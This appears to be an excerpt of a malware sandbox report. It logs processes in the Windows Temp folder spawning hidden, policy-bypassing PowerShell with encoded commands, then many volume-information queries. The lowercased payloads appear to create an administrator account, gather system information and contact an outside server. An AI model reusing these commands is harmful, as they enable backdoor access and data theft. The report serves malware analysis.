a9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8aoqbhaguayqa4agiazga4admamwbjadganwa3adaaoqa1adkazabiadcaywa3adiaoabmadqaywbjagqaywbmagmaoabmadqazqa5admamabhagyanabkagqanaa0aguanga1adiamqazagiaoqbiadqayqa0adcaoabladuazga4adyazabjadeamqa5ageamaa4adeamaaxadkanabhadkamaa4adcanaa0adaayga3adkamaazadgamgblagianwaxadeanqbhadkazaa2ageamwazagiaywawadiamaayadgazqa1aduanga3adgayqbiaguamaayageazaa0aduazaa0adgazqa5ageazgbhadkamwbhagyaoaazadcanqazadeazqazaduaygaxagmaoaa4aguangbiagyaywbhagyayqayadcazaa4adiazqbladianaa0adiamaazagiaoaa2ageanga1adaayqbjagyamwazadqangawadyanwa2aguamqa5aguanabkaduamabjagmaygbmadcayga3adkanqa1adcanqbiadqaoaaxaguaywa0agqanaazaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakag	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
